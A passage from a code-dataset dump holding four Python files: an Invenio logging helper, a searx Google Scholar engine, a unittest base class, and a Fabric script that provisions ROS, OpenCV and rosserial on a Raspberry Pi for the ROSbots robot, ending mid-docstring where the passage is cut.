| text (string, lengths 6–947k) | repo_name (string, lengths 5–100) | path (string, lengths 4–231) | language (1 class) | license (15 classes) | size (int64, 6–947k) | score (float64, 0–0.34) |
|---|---|---|---|---|---|---|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2005, 2006, 2007, 2008, 2009, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
from __future__ import print_function
VERBOSITY = None
import sys
from datetime import datetime
from invenio.legacy.bibsched.bibtask import write_message as bibtask_write_message
def setup_loggers(verbosity):
global VERBOSITY
if verbosity > 8:
print('Setting up loggers: verbosity=%s' % verbosity)
VERBOSITY = verbosity
def write_message(msg, stream=sys.stdout, verbose=1):
"""Write message and flush output stream (may be sys.stdout or sys.stderr).
Useful for debugging stuff."""
if VERBOSITY is None:
return bibtask_write_message(msg, stream, verbose)
elif msg and VERBOSITY >= verbose:
if VERBOSITY > 8:
print(datetime.now().strftime('[%H:%M:%S] '), end=' ', file=stream)
print(msg, file=stream)
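if __name__ == '__main__':
    # Hypothetical usage sketch (not part of the original module): once
    # setup_loggers() has been called, write_message() bypasses the bibsched
    # logger and prints directly, honouring the verbosity threshold.
    setup_loggers(verbosity=9)
    write_message('parsing references', verbose=2)   # printed: 9 >= 2, and 9 > 8 adds a [HH:MM:SS] prefix
    write_message('very chatty detail', verbose=10)  # suppressed: 9 < 10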
| PXke/invenio | invenio/legacy/docextract/utils.py | Python | gpl-2.0 | 1,606 | 0.010585 |
# SPDX-License-Identifier: AGPL-3.0-or-later
# lint: pylint
"""Google (Scholar)
For detailed description of the *REST-full* API see: `Query Parameter
Definitions`_.
.. _Query Parameter Definitions:
https://developers.google.com/custom-search/docs/xml_results#WebSearch_Query_Parameter_Definitions
"""
# pylint: disable=invalid-name, missing-function-docstring
from urllib.parse import urlencode
from datetime import datetime
from lxml import html
from searx import logger
from searx.utils import (
eval_xpath,
eval_xpath_list,
extract_text,
)
from searx.engines.google import (
get_lang_info,
time_range_dict,
detect_google_sorry,
)
# pylint: disable=unused-import
from searx.engines.google import (
supported_languages_url,
_fetch_supported_languages,
)
# pylint: enable=unused-import
# about
about = {
"website": 'https://scholar.google.com',
"wikidata_id": 'Q494817',
"official_api_documentation": 'https://developers.google.com/custom-search',
"use_official_api": False,
"require_api_key": False,
"results": 'HTML',
}
# engine dependent config
categories = ['science']
paging = True
language_support = True
use_locale_domain = True
time_range_support = True
safesearch = False
logger = logger.getChild('google scholar')
def time_range_url(params):
"""Returns a URL query component for a google-Scholar time range based on
    ``params['time_range']``. Google Scholar only supports ranges in years, so to
    have any effect all Searx ranges (*day*, *week*, *month*, *year*) are mapped
    to *year*. If no range is set, an empty string is returned.
Example::
&as_ylo=2019
"""
# as_ylo=2016&as_yhi=2019
    ret_val = ''
    if params['time_range'] in time_range_dict:
        ret_val = '&' + urlencode({'as_ylo': datetime.now().year - 1})
    return ret_val
def request(query, params):
"""Google-Scholar search request"""
offset = (params['pageno'] - 1) * 10
lang_info = get_lang_info(
# pylint: disable=undefined-variable
# params, {}, language_aliases
params, supported_languages, language_aliases
)
# subdomain is: scholar.google.xy
lang_info['subdomain'] = lang_info['subdomain'].replace("www.", "scholar.")
    query_url = 'https://' + lang_info['subdomain'] + '/scholar' + '?' + urlencode({
        'q': query,
        'hl': lang_info['hl'],
        'lr': lang_info['lr'],
        'ie': "utf8",
        'oe': "utf8",
        'start': offset,
    })
query_url += time_range_url(params)
logger.debug("query_url --> %s", query_url)
params['url'] = query_url
logger.debug("HTTP header Accept-Language --> %s", lang_info['Accept-Language'])
params['headers']['Accept-Language'] = lang_info['Accept-Language']
params['headers']['Accept'] = (
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
)
#params['google_subdomain'] = subdomain
return params
def response(resp):
"""Get response from google's search request"""
results = []
detect_google_sorry(resp)
# which subdomain ?
# subdomain = resp.search_params.get('google_subdomain')
# convert the text to dom
dom = html.fromstring(resp.text)
# parse results
for result in eval_xpath_list(dom, '//div[@class="gs_ri"]'):
title = extract_text(eval_xpath(result, './h3[1]//a'))
if not title:
# this is a [ZITATION] block
continue
url = eval_xpath(result, './h3[1]//a/@href')[0]
content = extract_text(eval_xpath(result, './div[@class="gs_rs"]')) or ''
pub_info = extract_text(eval_xpath(result, './div[@class="gs_a"]'))
if pub_info:
content += "[%s]" % pub_info
pub_type = extract_text(eval_xpath(result, './/span[@class="gs_ct1"]'))
if pub_type:
title = title + " " + pub_type
results.append({
'url': url,
'title': title,
'content': content,
})
# parse suggestion
for suggestion in eval_xpath(dom, '//div[contains(@class, "gs_qsuggest_wrap")]//li//a'):
# append suggestion
results.append({'suggestion': extract_text(suggestion)})
for correction in eval_xpath(dom, '//div[@class="gs_r gs_pda"]/a'):
results.append({'correction': extract_text(correction)})
return results
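# Usage note (a sketch of the surrounding searx engine contract, as assumed here):
# searx first calls request(query, params) to fill in params['url'] and
# params['headers'], performs the HTTP request itself, and then hands the reply
# to response(resp) to obtain the normalised result dicts built above.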
| dalf/searx | searx/engines/google_scholar.py | Python | agpl-3.0 | 4,416 | 0.003397 |
import unittest
from aquarius.Aquarius import Aquarius
class ConsoleTestBase(unittest.TestCase):
def initialise_app_mock(self):
self.app = Aquarius(None, None, None)
def assert_called(self, method):
self.assertTrue(method.called)
| jeroanan/Aquarius | tests/output/console/ConsoleTestBase.py | Python | gpl-3.0 | 257 | 0.003891 |
#
# This file is part of ROSbots Setup Tools.
#
# Copyright
#
# Copyright (C) 2017 Jack Pien <jack@rosbots.com>
#
# License
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details at
# <http://www.gnu.org/licenses/lgpl-3.0-standalone.html>
#
# Documentation
#
# http://www.rosbots.com
#
import os
import datetime as dt
import random
import time
from fabric.api import *
import fabric.contrib.files as fabfiles
from fabric.utils import fastprint
#env.hosts = ["localhost"]
env.user = 'pi'
env.shell = '/bin/bash -l -c'
is_debug = False
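# Usage note (assumed Fabric 1.x invocation; the host address is a placeholder):
# tasks in this fabfile are run against the Pi over SSH, e.g.
#     fab -H pi@192.168.1.42 main_setup_ros_opencv_for_rosbots
#     fab -H pi@192.168.1.42 push_test_ros_script:./foo.py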
def _get_input(msg, force_need_query=False):
global is_debug
if is_debug or force_need_query:
val = raw_input(msg + "\n")
return val
else:
return ""
def _fp(msg):
fastprint(msg + "\n")
def _pp(msg):
"""
Print then pause
"""
global is_debug
_fp(msg)
if is_debug:
programPause = _get_input("Press the <ENTER> key to continue...")
WS_DIR = "/ros_catkin_ws"
INSTALL_DIR = WS_DIR + "/build/opt/ros/kinetic"
def main_setup_only_rosbots_components():
step_7_setup_ros_rosbots_packages()
step_8_setup_mcu_uno_support()
step_9_setup_mcu_uno_support_part_2()
def main_setup_ros_opencv_for_rosbots():
step_1_setup_ros_for_pi()
step_2_setup_ros_robot_packages()
#step_3_setup_ros_rosbots_packages()
step_4_setup_opencv_for_pi()
step_5_setup_ros_robot_image_common_package()
step_6_setup_ros_robot_vision_packages()
step_7_setup_ros_rosbots_packages()
step_8_setup_mcu_uno_support()
step_9_setup_mcu_uno_support_part_2()
def main_setup_ros_opencv():
step_1_setup_ros_for_pi()
step_2_setup_ros_robot_packages()
step_4_setup_opencv_for_pi()
step_5_setup_ros_robot_image_common_package()
step_6_setup_ros_robot_vision_packages()
def helloworld():
run("ls -la")
#with cd("~"):
# home_path = run("pwd")
# ws_dir = home_path + WS_DIR
# put("./rosbots_service_template.bash", "~/rosbots_template")
# run("cat rosbots_template | sed 's/_TEMPLATE_HOME/" + home_path.replace("/", "\/") + "/' | sed 's/_TEMPLATE_WS_PATH/" + ws_dir.replace("/", "\/") + "/' > rosbots")
def how_to_test_rosbots_python_scripts():
_fp("Say you wrote a rosbots python script called foo.py. (1) chmod +x foo.py. (2) scp it over to the /home/pi/ros_catkin_ws/build/opt/ros/kinetic/share/rosbots_driver. (3) from remote machine 'rosrun rosbots_driver foo.py'")
def push_test_ros_script(path_fn=None):
    if path_fn is None:
_fp("\nERROR\nPlease specify local ROS script name")
_fp("$ fab push_test_ros_script:<script>")
return
fn = path_fn.split("/")[-1]
remote_path = "/home/pi/ros_catkin_ws/build/opt/ros/kinetic/share"
ros_pkg_name = "rosbots_driver"
_fp("Pushing " + path_fn + " to remote location: " +
remote_path + "/" + ros_pkg_name)
put(path_fn, remote_path + "/" + ros_pkg_name)
run("chmod +x " + remote_path + "/" + ros_pkg_name + "/" + fn)
#open_shell("rosrun " + ros_pkg_name + " " + fn)
run("sudo su -c 'source /home/pi/ros_catkin_ws/build/opt/ros/kinetic/setup.bash && export PYTHONPATH=/home/pi/lib/python:${PYTHONPATH} && rosrun " + ros_pkg_name + " " + fn + "'")
def push_test_rosbots_motor_driver_script():
run("echo 'Starting...'")
home_path = run("pwd")
rosbots_startup_fn = "rosbots_startup.sh"
local_md_dir = "../../ros_ws/src/rosbots_driver/scripts/rosbots_driver"
remote_md_dir = "/home/pi/ros_catkin_ws/build/opt/ros/kinetic/lib/rosbots_driver"
md_fn = "motor_driver.py"
rosnode_name = "/motor_driver"
# Kill current motor_driver node
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
if run("rosnode list | grep -i " + rosnode_name, warn_only=True).succeeded:
_fp("Killing current " + rosnode_name + " rosnode")
run("rosnode kill `rosnode list | grep -i " + rosnode_name + "`")
#_fp(actual_name)
#run("rosnode kill " + rosnode_name)
env.shell = old_shell
# Push new startup script
if False:
put("./rosbots_startup.sh", "~/rosbots_startup.sh")
run("chmod +x ~/rosbots_startup.sh")
# Push the new motor driver file
    if not fabfiles.exists(remote_md_dir + "/" + md_fn):
_fp("No remote " + md_fn + " found!!! Quitting")
return
else:
put(local_md_dir + "/" + md_fn, remote_md_dir + "/" + md_fn)
run("rm " + remote_md_dir + "/" + md_fn + "c", warn_only=True)
# Start the rosbots startup script
sudo("export ROSBOTS_HOME=/home/pi; export ROSBOTS_WS_PATH=/home/pi/ros_catkin_ws; " + home_path + "/" + rosbots_startup_fn)
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
_fp("List of running ros nodes")
run("rosnode list")
env.shell = old_shell
def setup_wifi_on_pi():
supplicant_fn = "/etc/wpa_supplicant/wpa_supplicant.conf"
run("echo 'Starting...'")
#if run("grep 'country=GB' " + supplicant_fn, warn_only=True).succeeded:
# pass
#else:
# _fp("")
# _pp("You should probably set 'country=US' in your supplicant file " + \
# supplicant_fn + " when you get a chance...")
wifi_reg_domain = _get_input("What is your country's wifi regulatory domain (ISO 3166 alpha2 country code, ie 'US')?", force_need_query=True)
_fp(wifi_reg_domain)
ssid_name = _get_input("What is the SSID?", force_need_query=True)
_fp(ssid_name)
if sudo("grep 'ssid=\"" + ssid_name + "\"' " + supplicant_fn, \
warn_only=True).succeeded:
_fp("This SSID is already set up")
else:
wpa_pwd = _get_input("What is the WPA pwd?", force_need_query=True)
_fp(wpa_pwd)
name = _get_input("What do you want to name this network?", force_need_query=True)
_fp(name)
_fp("Adding the network you specified into " + supplicant_fn)
network_config = "country=" + wifi_reg_domain + "\n" + \
"\n\n" + \
"network={\n" + \
" ssid=\"" + ssid_name + "\"\n" + \
" psk=\"" + wpa_pwd + "\"\n" + \
" id_str=\"" + name + "\"\n" + \
"}\n"
sudo("cp " + supplicant_fn + " " + supplicant_fn + ".old")
sudo("echo '" + network_config + "' >> " + supplicant_fn)
_fp("To get IP address of Pi, from a linux system - 'arp -a'")
def step_8_setup_mcu_uno_support():
_pp("Plug in the UNO board to the RPi's USB port")
home_path = run("pwd")
git_path = home_path + "/gitspace"
rosbots_path = git_path + "/rosbots_driver"
pio_path = rosbots_path + "/platformio/rosbots_firmware"
rosserial_path = git_path + "/rosserial"
ws_dir = home_path + "/rosbots_catkin_ws"
install_dir = home_path + INSTALL_DIR
main_ros_ws_dir = home_path + WS_DIR
# Just download, we'll build it isolated later
#_setup_ros_other_packages("actionlib_msgs", run_rosdep=False)
_setup_ros_other_packages("nav_msgs", run_rosdep=False)
# Need nav_msgs compiled
with cd(main_ros_ws_dir):
#run("./src/catkin/bin/catkin_make_isolated --pkg rosbots_driver --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
#run(main_ros_ws_dir + "/src/catkin/bin/catkin_make -j1 --pkg nav_msgs")
#run(main_ros_ws_dir + "/src/catkin/bin/catkin_make install -j1 --pkg nav_msgs")
#run("./src/catkin/bin/catkin_make_isolated --pkg actionlib_msgs --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
run("./src/catkin/bin/catkin_make_isolated --pkg nav_msgs --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
env.shell = old_shell
# Old pip causes incompleteread importerror
sudo("easy_install --upgrade pip")
# So we can access USB serial port
sudo("usermod -a -G dialout pi")
# Some requirements
sudo("pip install -U testresources")
sudo("pip install -U platformio")
sudo("pip install -U backports.functools_lru_cache")
_fp("=============")
_pp("If this is the first time running setup, the next step will most likely fail since you need a reboot to enable the UNO drivers. If it fails, reboot and run this step again.")
_fp("=============\n")
def step_9_setup_mcu_uno_support_part_2():
_pp("Plug in the UNO board to the RPi's USB port")
home_path = run("pwd")
git_path = home_path + "/gitspace"
rosbots_path = git_path + "/rosbots_driver"
pio_path = rosbots_path + "/platformio/rosbots_firmware"
rosserial_path = git_path + "/rosserial"
ws_dir = home_path + "/rosbots_catkin_ws"
install_dir = home_path + INSTALL_DIR
main_ros_ws_dir = home_path + WS_DIR
with cd(pio_path):
run("platformio run -e uno -t upload")
# We need diagnostic_msgs, but just download, we'll compile
# it on our own
_setup_ros_other_packages("diagnostic_msgs", run_rosdep=False)
# Download and install rosserial
if not fabfiles.exists(rosserial_path):
with cd(git_path):
run("git clone https://github.com/ros-drivers/rosserial.git")
_fp("Creating symbolic link to main ros workspace")
with cd(ws_dir + "/src"):
if fabfiles.exists("rosserial"):
run("rm rosserial")
run("ln -s " + rosserial_path)
else:
_fp("Found rosserial repo, just fetching top and rebasing")
with cd(rosserial_path):
run("git fetch origin")
run("git rebase origin/jade-devel")
with cd(ws_dir):
#run("./src/catkin/bin/catkin_make_isolated --pkg rosbots_driver --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
run(main_ros_ws_dir + "/src/catkin/bin/catkin_make -j1")
run(main_ros_ws_dir + "/src/catkin/bin/catkin_make install -j1")
env.shell = old_shell
# Need diagnostic_msgs which rosserial_python needs
# catkin_make_isolated --pkg diagnostic_msgs --install -DCMAKE_BUILD_TYPE=Release --install-space /home/pi/ros_catkin_ws/build/opt/ros/kinetic
subpackage = "diagnostic_msgs"
with cd(main_ros_ws_dir):
run("./src/catkin/bin/catkin_make_isolated --pkg " + subpackage + " --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j1")
#Update pip if necessary
sudo("easy_install --upgrade pip")
# Rerun the init script
sudo("systemctl stop rosbots")
sudo("systemctl start rosbots")
def step_5_setup_ros_robot_image_common_package():
home_path = run("pwd")
install_dir = home_path + INSTALL_DIR
main_ros_ws_dir = home_path + WS_DIR
_pp("Usually done after you set up OpenCV and the other robot and rosbot packages. This mainly sets up image_transport.")
_setup_ros_other_packages("image_common")
def step_2_setup_ros_robot_packages():
_pp("After you successfully install ros_com stuff, install some others. This installs geometry_msgs needed for Twist among other types of basic telemetry messages.")
_setup_ros_other_packages("geometry_msgs")
_setup_ros_other_packages("teleop_twist_keyboard")
def _setup_ros_packages_from_git(ros_package_name, git_url, subpackage_list):
run("echo 'Starting...'")
home_path = run("pwd")
git_path = home_path + "/gitspace"
ros_package_path = git_path + "/" + ros_package_name #"/rosbots"
ws_dir = home_path + WS_DIR
install_dir = home_path + INSTALL_DIR
_fp("Do we need to create gitspace folder?")
if not fabfiles.exists(git_path):
run("mkdir " + git_path)
_fp("Do we need to git clone the repo?")
if not fabfiles.exists(ros_package_path):
_fp("Did not find " + ros_package_name + " repo, cloning...")
with cd(git_path):
run("git clone " + git_url)
_fp("Creating symbolic link to main ros workspace")
with cd(ws_dir + "/src"):
if fabfiles.exists(ros_package_name):
run("rm " + ros_package_name)
run("ln -s " + ros_package_path)
else:
#_fp("Found the repo, just fetching top and rebasing")
#with cd(ros_package_path):
# run("git fetch origin")
# run("git rebase origin/master")
_pp("Found the repo, not doing anything - feel free to git fetch and rebase manually")
for subpackage in subpackage_list:
_fp("Compiling " + subpackage + "...")
with cd(ws_dir):
run("./src/catkin/bin/catkin_make_isolated --pkg " + subpackage + " --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j1")
def step_6_setup_ros_robot_vision_packages():
_fp("Usually done after you set up OpenCV and the other robot and rosbot packages")
_pp("This sets up mainly cv_bridge so we can pass CV image messages around. Setting up from github instead of rosinstall because rosinstall will pull in OpenCV automatically and you should have already built it from source.")
_setup_ros_packages_from_git("vision_opencv", \
"https://github.com/ros-perception/vision_opencv.git", \
["cv_bridge", "image_geometry", "vision_opencv"])
def step_7_setup_ros_rosbots_packages():
run("echo 'Starting...'")
home_path = run("pwd")
git_path = home_path + "/gitspace"
rosbots_path = git_path + "/rosbots_driver"
ws_dir = home_path + "/rosbots_catkin_ws" # home_path + WS_DIR
install_dir = home_path + INSTALL_DIR
main_ros_ws_dir = home_path + WS_DIR
# Just download tf and geometry2, which includes tf2.
# We'll compile it ourselves later
_setup_ros_other_packages("geometry", run_rosdep=False)
_setup_ros_other_packages("geometry2", run_rosdep=False)
# Need tf and tf2 compiled
with cd(main_ros_ws_dir):
#run("./src/catkin/bin/catkin_make_isolated --pkg rosbots_driver --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
package_list = [
"angles", "actionlib_msgs", "actionlib", "tf2_msgs", "tf2", "tf2_py", "tf2_ros", "tf"]
for pkg in package_list:
run("./src/catkin/bin/catkin_make_isolated --pkg " + pkg + " --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
env.shell = old_shell
sudo("apt-get install -y python-pip")
sudo("pip install picamera")
# Create a separate rosbots_catkin_ws outside of core ROS
if not fabfiles.exists(ws_dir):
_fp("Need to create and init rosbots catkin workspace")
run("mkdir -p " + ws_dir + "/src")
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
with cd(ws_dir + "/src"):
run(main_ros_ws_dir + "/src/catkin/bin/catkin_init_workspace")
with cd(ws_dir):
run(main_ros_ws_dir + "/src/catkin/bin/catkin_make")
run(main_ros_ws_dir + "/src/catkin/bin/catkin_make install")
env.shell = old_shell
src_cmd = "source " + ws_dir + "/devel/setup.bash"
if run("grep '" + src_cmd + "' ~/.bashrc", warn_only=True).succeeded:
_fp("Sourcing of ROSbots catkin ws env setup.bash is already in your bashrc")
else:
_pp("Going to add ROSbots catkin ws source setup into your bashrc")
run("echo '" + src_cmd + "\n' >> ~/.bashrc")
if not fabfiles.exists(git_path):
_fp("Did not find rosbots repo, cloning...")
run("mkdir " + git_path)
if not fabfiles.exists(rosbots_path):
with cd(git_path):
run("git clone https://github.com/ROSbots/rosbots_driver.git")
_fp("Creating symbolic link to main ros workspace")
with cd(ws_dir + "/src"):
if fabfiles.exists("rosbots_driver"):
run("rm rosbots_driver")
run("ln -s " + rosbots_path)
else:
_fp("Found rosbots repo, just fetching top and rebasing")
with cd(rosbots_path):
run("git fetch origin")
run("git rebase origin/master")
with cd(ws_dir):
#run("./src/catkin/bin/catkin_make_isolated --pkg rosbots_driver --install -DCMAKE_BUILD_TYPE=Release --install-space " + install_dir + " -j2")
old_shell = env.shell
env.shell = '/bin/bash -l -c -i'
run(main_ros_ws_dir + "/src/catkin/bin/catkin_make")
run(main_ros_ws_dir + "/src/catkin/bin/catkin_make install")
env.shell = old_shell
# Installing RPIO DMA PWM library
with cd(git_path):
# Don't install RPIO library. May be causing non-deterministic
# kernel panic when used.
#if not fabfiles.exists("RPIO"):
if False:
_pp("Did not find RPIO library so downloading and setting up")
# Old library does not support RPi 3
#run("git clone https://github.com/metachris/RPIO.git --branch v2 --single-branch")
#run("git clone https://github.com/limuxy/RPIO.git")
run("git clone https://github.com/ROSbots/RPIO.git --branch v2_branch --single-branch")
with cd("RPIO"):
run("python setup.py build")
_pp("Did build complete for RPIO?")
run("mkdir -p " + home_path + "/lib/python")
run("export PYTHONPATH=" + home_path + "/lib/python; python setup.py -v install --home " + home_path)
_pp("Did RPIO install correctly into " + home_path + "?")
# Update with newest bashrc for rosbots
put("./sourceme_rosbots.bash", "~/")
# Rerun the init script
sudo("systemctl stop rosbots")
sudo("systemctl start rosbots")
def _setup_ros_other_packages(rospkg, run_rosdep=True):
run("echo 'Starting...'")
home_path = run("pwd")
ws_dir = home_path + WS_DIR
if not fabfiles.exists(ws_dir):
_fp("ROS Workspace not found - run the main set up first")
return
with cd(ws_dir):
ts = str(time.time()).split(".")[0]
fn = "kinetic-custom_" + str(ts) + "_ros.rosinstall"
run("rosinstall_generator " + rospkg + " --rosdistro kinetic --deps --wet-only --tar > " + fn)
run("cat " + fn)
_pp("Did rosinstall generator create the install file correctly? If so, we're going to merge and update the workspace. (If there are duplicate packages, hit DELETE and REPLACE!)")
run("wstool merge -y -t src " + fn)
_pp("Did the wstool merge correctly? If so, we are going to update on the install file for the workspace.")
run("wstool update --delete-changed-uris -t src")
_pp("Did the wstool update correctly? If so, we are going to update dependencies.")
if run_rosdep:
run("rosdep install --from-paths src --ignore-src --rosdistro kinetic -y -r --os=debian:jessie")
_pp("Did the dependencies update ok? If so, let's compile the new packages.")
run("./src/catkin/bin/catkin_make_isolated --install -DCMAKE_BUILD_TYPE=Release --install-space " + home_path + INSTALL_DIR + " -j1")
def step_4_setup_opencv_for_pi():
"""
To build this in a Docker container:
run:
docker run -it --name rosbots_build rosbots-raspbian:lite /bin/bash
apt-get update; apt-get -y upgrade
apt-get install -y libgdk-pixbuf2.0-dev libpango1.0-dev libcairo2-dev
apt-get install -y libgtk2.0-dev
apt-get install -y build-essential cmake pkg-config libjpeg-dev libtiff5-dev libjasper-dev libpng12-dev libavcodec-dev libavformat-dev libswscale-dev libv4l-dev libxvidcore-dev libx264-dev libatlas-base-dev gfortran python2.7-dev python3-dev libavutil-dev python-pip git
pip install numpy
mkdir -p /home/pi/gitspace
cd /home/pi/gitspace
git clone https://github.com/opencv/opencv.git
cd opencv
git checkout -b 3.4.6_branch tags/3.4.6
cd ../
git clone https://github.com/opencv/opencv_contrib.git
cd opencv_contrib
git checkout -b 3.4.6_branch tags/3.4.6
cd ../opencv
mkdir build
cd build
cmake -D CMAKE_BUILD_TYPE=RELEASE -D CMAKE_INSTALL_PREFIX=/usr/local -D INSTALL_PYTHON_EXAMPLES=ON -D OPENCV_ENABLE_NONFREE=ON -D OPENCV_EXTRA_MODULES_PATH=/home/pi/gitspace/opencv_contrib/modules -D BUILD_EXAMPLES=ON ..
make -j4
    On physical RPi:
cd /home/pi/gitspace
git clone https://github.com/opencv/opencv.git
cd opencv
git checkout -b 3.4.6_branch tags/3.4.6
cd ../
git clone https://github.com/opencv/opencv_contrib.git
cd opencv_contrib
git checkout -b 3.4.6_branch tags/3.4.6
copy /home/pi/gitspace/opencv/build to /home/pi/gitspace/opencv
sudo apt-get update; sudo apt-get -y upgrade
sudo apt-get install -y libgdk-pixbuf2.0-dev libpango1.0-dev libcairo2-dev
sudo apt-get install -y libgtk2.0-dev
sudo apt-get install -y build-essential cmake pkg-config libjpeg-dev libtiff5-dev libjasper-dev libpng12-dev libavcodec-dev libavformat-dev libswscale-dev libv4l-dev libxvidcore-dev libx264-dev libatlas-base-dev gfortran python2.7-dev python3-dev libavutil-dev python-pip git
then cd /home/pi/gitspace/opencv/build,
'sudo make install/fast', 'sudo ldconfig'
"""
_pp("Roughly following http://www.pyimagesearch.com/2016/04/18/install-guide-raspberry-pi-3-raspbian-jessie-opencv-3/")
#_fp("Update system first")
#sudo("apt-get update")
#sudo("apt-get -y upgrade")
_fp("Installing dependencies for OpenCV")
# Need to install libgtk2.0 first in Stretch?!?
sudo("apt-get install -y libgtk2.0-dev")
sudo("apt-get install -y build-essential cmake pkg-config libjpeg-dev libtiff5-dev libjasper-dev libpng12-dev libavcodec-dev libavformat-dev libswscale-dev libv4l-dev libxvidcore-dev libx264-dev libatlas-base-dev gfortran python2.7-dev python3-dev")
# Needed for web_video_server and perhaps help with OpenCV support as well
sudo("apt-get install -y libavutil-dev")
sudo("apt-get install -y python-pip")
sudo("sudo pip install numpy")
sudo("sudo pip install --upgrade numpy")
home_path = run("pwd")
git_path = home_path + "/gitspace"
_fp("Do we need to create gitspace folder?")
if not fabfiles.exists(git_path):
run("mkdir " + git_path)
_fp("Git cloning OpenCV if need be")
if not fabfiles.exists(git_path + "/opencv"):
with cd(git_path):
run("git clone https://github.com/opencv/opencv.git")
with cd(git_path + "/opencv"):
run("git tag -l")
#_pp("We are compiling 3.4.1 - make sure this is the latest from the tag list printed above")
#run("git checkout -b 3.4.1_branch tags/3.4.1")
_pp("We are compiling 3.4.6 - make sure this is the latest from the tag list printed above")
run("git checkout -b 3.4.6_branch tags/3.4.6")
opencv_contrib_path = git_path + "/opencv_contrib"
if not fabfiles.exists(opencv_contrib_path):
with cd(git_path):
run("git clone https://github.com/opencv/opencv_contrib.git")
with cd(opencv_contrib_path):
run("git tag -l")
#_pp("We are compiling 3.4.1 - make sure this is the latest from the tag list printed above")
#run("git checkout -b 3.4.1_branch tags/3.4.1")
_pp("We are compiling 3.4.6 - make sure this is the latest from the tag list printed above")
run("git checkout -b 3.4.6_branch tags/3.4.6")
_fp("Setting up OpenCV cmake if need be")
if not fabfiles.exists(git_path + "/opencv/build"):
with cd(git_path + "/opencv"):
run("mkdir build")
# Set up compile
with cd(git_path + "/opencv/build"):
run("cmake -D CMAKE_BUILD_TYPE=RELEASE " + \
"-D CMAKE_INSTALL_PREFIX=/usr/local " + \
"-D INSTALL_PYTHON_EXAMPLES=ON -D OPENCV_ENABLE_NONFREE=ON " + \
"-D OPENCV_EXTRA_MODULES_PATH=" + \
opencv_contrib_path + "/modules " + \
"-D BUILD_EXAMPLES=ON ..")
# Compile
_fp("Compiling OpenCV...")
with cd(git_path + "/opencv/build"):
run("make -j1")
sudo("make install")
sudo("ldconfig")
def step_x_setup_ros_for_ubuntu_mate_pi():
run("echo 'Roughly following http://wiki.ros.org/kinetic/Installation/Ubuntu'")
_pp("* If you need to do raspi-config stuff, CTRL-C out and do that before running this script")
# Setup ROS Repositories
if not fabfiles.exists("/etc/apt/sources.list.d/ros-latest.list"):
sudo("apt-get update")
sudo("sh -c 'echo \"deb http://packages.ros.org/ros/ubuntu $(lsb_release -sc) main\" > /etc/apt/sources.list.d/ros-latest.list'")
sudo("apt-key adv --keyserver hkp://ha.pool.sks-keyservers.net:80 --recv-key 421C365BD9FF1F717815A3895523BAEEB01FA116") #apt-key adv --keyserver hkp://ha.pool.sks-keyservers.net:80 --recv-key 0xB01FA116")
sudo("apt-get update")
sudo("apt-get -y upgrade")
else:
_fp("ros-lastest.list already exists... skipping set up")
sudo("apt-get update")
sudo("apt-get -y upgrade")
sudo("apt-get install -y ros-kinetic-ros-base")
def step_1_setup_ros_for_pi():
"""
To compile ros2 on in a Docker Raspbian container:
docker run -it --name rosbots_ros2_build rosbots-raspbian:lite /bin/bash
update-locale LC_ALL=en_GB.UTF-8 LANG=en_GB.UTF-8
export LANG=en_GB.UTF-8
export LC_ALL=en_GB.UTF-8
apt update && apt install -y \
build-essential \
cmake \
git \
python3-pip \
python-rosdep \
libxml2-dev \
libxslt1-dev \
wget
apt install -y virtualenvwrapper
source /usr/share/virtualenvwrapper/virtualenvwrapper.sh
mkvirtualenv py_3 --python=/usr/bin/python3
pip install -U argcomplete catkin_pkg colcon-common-extensions coverage empy flake8 flake8-blind-except flake8-builtins flake8-class-newline flake8-comprehensions flake8-deprecated flake8-docstrings flake8-import-order flake8-quotes lark-parser mock nose pep8 pydocstyle pyparsing setuptools vcstool \
pytest-repeat \
pytest-rerunfailures \
pytest \
pytest-cov \
pytest-runner \
lxml \
rosdep
apt-get install --no-install-recommends -y \
libasio-dev \
libtinyxml2-dev
mkdir -p /home/pi/ros2_ws/src
cd /home/pi/ros2_ws
wget https://raw.githubusercontent.com/ros2/ros2/release-latest/ros2.repos
vcs import src < ros2.repos
(sudo) rosdep init
rosdep update
rosdep install --from-paths src --ignore-src --rosdistro crystal -y -r --os=debian:stretch
pip install -U lark-parser
colcon build --symlink-install --packages-skip ros1_bridge --packages-ignore qt_gui_cpp rqt_gui_cpp
On the physical RPi, do all steps above except the colcon build step
then, docker cp /home/pi/ros2_ws/install ./build ./log to the physical RPi /home/pi/ros2_ws
Install python3.6
Change these scripts to use the python3 in the correct virtualenv directory
install/ros2cli/bin/_ros2_daemon:#!/root/.virtualenvs/py_3/bin/python3
install/ros2cli/bin/ros2:#!/root/.virtualenvs/py_3/bin/python3
